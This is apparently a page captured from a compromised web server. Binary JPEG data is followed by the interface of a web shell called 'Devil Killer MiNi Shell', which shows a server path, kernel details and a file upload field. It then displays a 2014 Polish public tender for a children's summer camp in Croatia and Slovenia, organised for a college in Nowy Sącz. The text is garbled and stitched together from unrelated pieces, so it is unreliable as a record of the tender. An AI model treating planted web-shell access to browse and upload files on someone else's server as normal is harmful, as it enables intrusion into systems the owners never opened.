JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140416/131102-N-2014.html

<p class="kh_header"><b>Nowy Sącz: Organizacja wypoczynku letniego dla dzieci pracowników Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu, współfinansowanego ze środków Zakładowego Funduszu Świadczeń Socjalnych</b><br>
<b>Numer ogłoszenia: 131102 - 2014; data zamieszczenia: 16.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Nowym Sączu , ul. Staszica 1, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4434545, faks 018 4434545.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz-ns.edu.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wypoczynku letniego dla dzieci pracowników Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu, współfinansowanego ze środków Zakładowego Funduszu Świadczeń Socjalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa organizacji wypoczynku letniego dla dzieci pracowników Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu, współfinansowanego ze środków Zakładowego Funduszu Świadczeń Socjalnych, zwanego dalej <<wypoczynkiem>> lub <<kolonią>>. 2. Miejsce realizacji przedmiotu zamówienia (położenie ośrodka): Chorwacja - miejscowość Umag lub bezpośrednia okolica Umagu (do 10 km), Słowenia - Morawske Toplice. 3. Okres realizacji przedmiotu zamówienia: pobyt 12-dniowy (9 noclegów plus przejazdy) w okresie:  29.06. - 10.07.2014 r. - zgodnie z minimalnym programem wypoczynku określonym w pkt. 17. 4. Liczba uczestników: 50-osobowa grupa dzieci i młodzieży w wieku od 7 do 18 lat. 5. Zamawiający przewiduje opcję zmniejszenia liczby uczestników do 30%. Ostateczna liczba uczestników kolonii będzie podana na nie mniej niż 5 dni przed realizacją usługi. 6. Wyżywienie w stołówce ośrodka, według ogólnych zasad żywienia dzieci i  młodzieży, tj. min: 1) 3 posiłki dziennie: śniadanie, obiad, kolacja - śniadania i kolacje w formie szwedzkiego stołu, obiady serwowane - kuchnia lokalna zróżnicowana i urozmaicona, woda niegazowana podawana do wszystkich posiłków. Na czas przejazdu z Chorwacji do Słowenii suchy prowiant (pieczywo z serem lub wędliną), woda mineralna, owoc); 2) pierwszy posiłek - kolacja w dniu 30.06.2014 r.; ostatni posiłek - obiad w dniu 09.07.2014 r. plus suchy prowiant na drogę (pieczywo z serem lub wędliną, owoc, woda mineralna); 3) w przypadku wycieczek - suchy prowiant (pieczywo z serem lub wędliną), woda mineralna, owoc; 4) dostępność napojów - stały dostęp do napojów; 5) posiłki muszą być sporządzane i wydawane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego oraz wykonane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia. Wyklucza się mięso i potrawy (posiłki) z puszek konserwowych, słoików, itp. 6) nie dopuszcza się podawania i serwowania posiłków w naczyniach jednorazowych. 7. Transport: 1) Autokar wysokopokładowy  klasy <<Lux>>, posiadający klimatyzację, WC, uchylne siedzenia, video, ubezpieczony (OC i NNW pasażerów), nie starszy niż 10 lat; 2) autokar wyposażony w barek zapewniający możliwość sporządzenia ciepłych napojów w czasie podróży; 3)  transport na trasie: Nowy Sącz - Umag lub bezpośrednia okolica Umagu (do 10 km) (Chorwacja) - Morawske Toplice (Słowenia) - Nowy Sącz, miejsce zbiórki w Nowym Sączu i powrotu zostanie ustalone z upoważnionym przedstawicielem Zamawiającego; 4) wszelkie opłaty związane z transportem (przejazdy autostradami, parkingi, itp.) muszą być wliczone w cenę oferty; 5) wyjazd  z Nowego Sącza w dniu 29.06.2014 r. w godz. wieczornych (ok. 20.00), powrót  - wyjazd ze Słowenii w dniu 09.07.2014 r. po obiedzie  ok. godz. 14.00, powrót do Nowego Sącza w godzinach rannych w dniu 10.07.2014 r.; 6) opieka pedagogiczna na trasie przejazdu na kolonię i w drodze powrotnej; 7) autokar do dyspozycji uczestników podczas trwania kolonii. 8. Rezerwacja statku na całodzienny rejs wraz z kapitanem posiadającym stosowne uprawnienia (wymagana kopia uprawnień kapitana). 9. Opieka wychowawców i kierownika - wykwalifikowana kadra pedagogiczna posiadająca właściwe kwalifikacje, uprawnienia wychowawców kolonijnych i kierownika kolonii zatwierdzone przez właściwe władze oświatowe, kadra w liczbie zgodnej z normami Rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z  późn. zm.) zwanym dalej <<rozporządzeniem>>. Wymagane jest bezwzględne zapewnienie dzieciom stałej opieki wykwalifikowanej kadry wychowawców z chwilą przejęcia od rodziców (prawnych opiekunów) do czasu ponownego przekazania rodzicom (prawnym opiekunom). Wszelkie koszty w tym zakresie ponosi Wykonawca. 10. Opieka medyczna wliczona w cenę oferty, w tym zapewnienie korzystania z bezpłatnych podstawowych lekarstw (za wyjątkiem leków przyjmowanych przez dziecko na stałe), zgodnie z obowiązującymi w tym zakresie przepisami. 11. Opieka ratownika posiadającego odpowiednie uprawnienia na kąpielisku. 12.  Rezerwacja statku na całodzienny rejs wraz z kapitanem posiadającym stosowne uprawnienia. 13.   Zakres usługi: 1) grupa 50-osobowa (podzielona na 3 grupy kolonijne); 2) 6 noclegów w ośrodku w Chorwacji, 3 noclegi w ośrodku w Słowenii; 3) ponadto, Wykonawca poniesie koszty pobytu jednej osoby - pracownika Zamawiającego, która będzie nadzorować prawidłowe wykonanie umowy. 14. Ubezpieczenie uczestników przez cały okres trwania wypoczynku, od chwili zbiórki dzieci przed wyjazdem, do chwili powrotu i odbioru dzieci przez rodziców (opiekunów prawnych): 1) KL - suma ubezpieczenia minimalnie 15.000 EUR.; 2) NW - na sumę minimalnie 7.000 PLN; 3) Ubezpieczenie od sportów podwyższonego ryzyka; 4) Ubezpieczenie obejmujące choroby przewlekłe. 15. Położenie obiektu, opis wyposażenia (możliwość korzystania przez uczestników kolonii w cenie oferty): A. W CHORWACJI: 1) Ośrodek położony bezpośrednio nad morzem, dozorowany całodobowo; 2) Obiekt musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych; 3) posiadający własną żwirkową plażę; 4) posiadający własne czynne kąpielisko (z ratownikiem); 5) możliwość organizowania gier zręcznościowych; 6) boisko do siatkówki, piłki nożnej, koszykówki, kometki, badmintona; 7) sprzęt sportowy; 8) plac z zapleczem do organizowania imprez na wolnym powietrzu; 9) plac zabaw dla dzieci; 10) miejsce na ognisko, grill; 11) wyżywienie w stołówce na terenie ośrodka; 12) sala zabaw dla dzieci; tenis stołowy; 13) świetlicę ze sprzętem Hi-Fi, telewizorem, odtwarzaczem DVD, przeznaczoną na organizowanie imprez kulturalno-oświatowych i dyskotek; 14) dla potrzeb kolonii wydzielone izolatki; 15) obiekt murowany, suchy, spełniający wymogi bezpieczeństwa i higieny (określone odrębnymi przepisami). B. W SŁOWENII: 1) Obiekt położony w odległości max. 100 metrów od kompleksu basenów termalnych TERME 300, dozorowany całodobowo; 2) obiekt murowany, spełniający wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych; 3) boisko, ze sztuczną lub trawiastą nawierzchnią do dyspozycji; 4) wyżywienie w stołówce na terenie ośrodka; 5) standard zakwaterowania min 3*. 16 Pokoje: 1) Chorwacja - bungalowe 5-6 osobowe, składające się z 2 sypialni i pokoju dziennego będącego sypialnią dla pozostałych osób, każdy z łazienką i WC; Słowenia - pokoje 2-3 osobowe, każdy z łazienką i WC, wygodnie urządzone - standard; 2) wyposażone w tapczany jednoosobowe, szafki, szafy, wieszaki umożliwiające rozpakowanie bagażu przez każde dziecko, stół,  krzesła, pościel. 17. Minimalny program wypoczynku i atrakcje (wszystko w cenie oferty): 1) wycieczka autokarowa po Istrii  (Pula , Rovinj, Novigrad); 2) wycieczki turystyczne piesze ze zwiedzaniem najbliższej okolicy; 3) plażowanie i kąpiele w morzu pod opieką ratownika; 4) zajęcia ruchowe; 5) rozgrywki sportowe na obiektach ośrodka ( piłka nożna, siatkówka, koszykówka, kometka); 6) w przypadku niekorzystnych warunków atmosferycznych rozgrywki tenisa stołowego, zajęcia świetlicowe, gry i zabawy, turnieje tenisa stołowego, seanse filmowe - filmy dostosowane do wieku uczestników; 7) całodzienny rejs statkiem po morzu (potwierdzenie uprawnień kapitana); 8) gry i zabawy rekreacyjne, aerobic; 9) olimpiada kolonijna; 10)  wybory Miss i Mistera kolonii; 11)  konkursy z nagrodami: m.in. plastyczne, pokazu mody i inne; 12)  ognisko z pieczeniem kiełbasek i piosenkami; 13)  wstęp do zwiedzanych obiektów; 14)  korzystanie z urządzeń rekreacyjno-sportowych w ośrodkach; 15)  korzystanie z basenów w Morawskich Toplicach; 16)  dyskoteki i konkursy tańca; 17)  upominki, nagrody; 18) maksymalne zapełnienie dnia różnymi zajęciami i atrakcjami. 18. Do obowiązków Wykonawcy należy ponadto: 1) pokrywanie kosztów biletów wstępu; 2) pokrywanie kosztów leczenia, leków ( za wyjątkiem leków przyjmowanych przez dziecko na stałe); 3) utrzymywanie porządku w miejscu zorganizowanego wypoczynku; 4) zapewnienie możliwości kontaktu telefonicznego rodzicom (opiekunom prawnym) z uczestnikami; 5) zapewnienie bezpłatnego dostępu dzieci i młodzieży do obiektów sportowo-rekreacyjnych, sprzętu sportowego i kąpielisk; 6) zgłoszenie wypoczynku właściwemu Kuratorowi Oświaty, zgodnie z wymogami rozporządzenia; 7) przedstawienie zaświadczenia o zgłoszeniu wypoczynku, dokumentów dotyczących kwalifikacji kadry (wychowawcy i kierownik) na co najmniej 5 dni przed rozpoczęciem kolonii. 19. Cena jednostkowa dla uczestnika winna zawierać wszystkie koszty, obejmujące realizację przedmiotu zamówienia, w tym, w szczególności wszystkie wymogi wymienione w rozdziale III specyfikacji, jak również nie wymienione z nazwy a niezbędne do realizacji zamówienia, takie jak: opłaty drogowe, parkingowe, klimatyczne, bilety wstępu do zwiedzanych obiektów, itp. 20. Rozliczenie pomiędzy Zamawiającym a Wykonawcą odbywać się będzie na podstawie faktycznie zrealizowanej usługi tj. liczby uczestników. Zamawiający zastrzega, iż nie dopuszcza możliwości zmiany wysokości zadeklarowanej przez Wykonawcę ceny jednostkowej usługi wymienionej w ofercie. Oferowana cena ma formę wynagrodzenia niezmiennego. Oznacza to, że stawki jednostkowe są stałe przez cały okres obowiązywania umowy. 21. Zamawiający zastrzega sobie możliwość przeprowadzenia wizji lokalnej w zaoferowanych obiektach przed rozstrzygnięciem postępowania, celem oceny zgodności oferty Wykonawcy, w tym, w szczególności zgodności warunków lokalowych z wymaganiami Zamawiającego. 22. Zamawiający wymaga, aby kolonia została zorganizowana zgodnie  z wymogami rozporządzenia oraz wszelkimi innymi aktualnie obowiązującymi przepisami prawa. 23. Wykonawca oświadcza, że zapewni transport uczestników możliwie najkrótszą trasą - przejazd autostradami. 24. Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami Zamawiającego określonymi 
w specyfikacji, przy czym musi przedstawić pisemny opis warunków, miejsca zakwaterowania uczestników, programu kolonii, zakresu, funkcji i sposobu realizacji opieki. 25. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników kolonii, a tym samym ma obowiązek posiadania ubezpieczenia OC.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.51.00.00-7, 63.51.10.00-4, 55.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunku będzie dokonywana metodą spełnia/nie spełnia 2.Wykonawcy muszą wykazać, że: 1) posiadają aktualny wpis do Rejestru Organizatorów Turystyki i Pośredników Turystycznych zaświadczający, że prowadzą działalność gospodarczą w zakresie organizowania imprez turystycznych - zgodnie z art. 4 ust.1. ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (t. j.: Dz. U. z 2014 r., poz. 196) obejmujący kraje, w których wymagana jest realizacja kolonii oraz wymaganą formę transportu ; 2) posiadają aktualną umowę gwarancji bankowej lub ubezpieczeniowej lub umowę ubezpieczeniową na rzecz klientów - zgodnie z art. 5 ust. 1 pkt.2 ustawy o usługach turystycznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunku będzie dokonywana metoda spełnia/nie spełnia. 2. Wykonawcy muszą wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) należycie wykonali co najmniej dwie usługi organizacji kolonii lub obozów dla dzieci i młodzieży, przy czym każda usługa (wykonana w ramach jednej umowy) o wartości min. 80.000,00 PLN</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym 2) Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków opartych na przepisie art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunku będzie dokonywana metoda spełnia/nie spełnia 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia tj. 
-	mają do dyspozycji przynajmniej 3 wychowawców  z co najmniej pięcioletnim doświadczeniem w pracy wychowawcy kolonijnego, którzy będą uczestniczyć w wykonywaniu zamówienia (w tym kierownik kolonii), posiadających odpowiednie, udokumentowane kwalifikacje, uprawnienia zgodnie z wymogami rozporządzenia,
-	 osoba , która będzie pełniła funkcję kierownika kolonii musi spełniać wymagania wynikające z rozporządzenia tj., posiadać odpowiednie, udokumentowane kwalifikacje oraz posiadać co najmniej trzyletnie doświadczenie w kierowaniu kolonią</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Ocena spełnienia warunku będzie dokonywana metoda spełnia/nie spełnia 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej pozwalającej na realizację zamówienia, tj. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną sumę ubezpieczeniową/gwarancyjną 100 000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">DOKUMENTY potwierdzające, że oferowana usługa odpowiada wymaganiom Zamawiającego: 
a) opis obiektu kolonijnego i pomieszczeń przewidzianych dla dzieci potwierdzający spełnianie wymagań dotyczących obiektu określonych przez Zamawiającego w rozdziale III specyfikacji. Do opisu należy dołączyć zdjęcia, foldery, ulotki przedstawiające zewnętrzny i wewnętrzny wygląd obiektu;
b) propozycję programu przewidzianego do realizacji uwzględniającą zakres i minimalny program wypoczynku określony w rozdziale III specyfikacji</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) zaświadczenie o wpisie do Rejestru Organizatorów Turystyki i Pośredników Turystycznych właściwego Marszałka Województwa stwierdzające, że prowadzą działalność gospodarczą w zakresie organizowania imprez turystycznych - zgodnie z art. 4 ust.1 ustawy o usługach turystycznych obejmującym kraj, w którym wymagana jest realizacja kolonii; 2) aktualna umowa gwarancji bankowej lub ubezpieczeniowej na rzecz klientów - zgodnie z art. 5 ust. 1 pkt. 2 ustawy o usługach turystycznych w zakresie pokrycia kosztów powrotu klienta do kraju, w wypadku gdy organizator turystyki lub pośrednik turystyczny wbrew obowiązkowi nie zapewnia tego powrotu, a także na pokrycie zwrotu wpłat wniesionych przez klientów w razie niewykonania zobowiązań umownych; 3)OŚWIADCZENIE o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy, 4)Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku, jeżeli Wykonawca polega na wiedzy na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ustawy dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia niewymienionych okoliczności, z uwzględnieniem podanych warunków ich wprowadzenia: 1) zmiany terminu realizacji umowy w przypadku, gdy zmiana wynika z winy lub na wniosek Zamawiającego; 2) zmiany wynagrodzenia Wykonawcy w przypadku ustawowej zmiany stawki podatku od towarów 
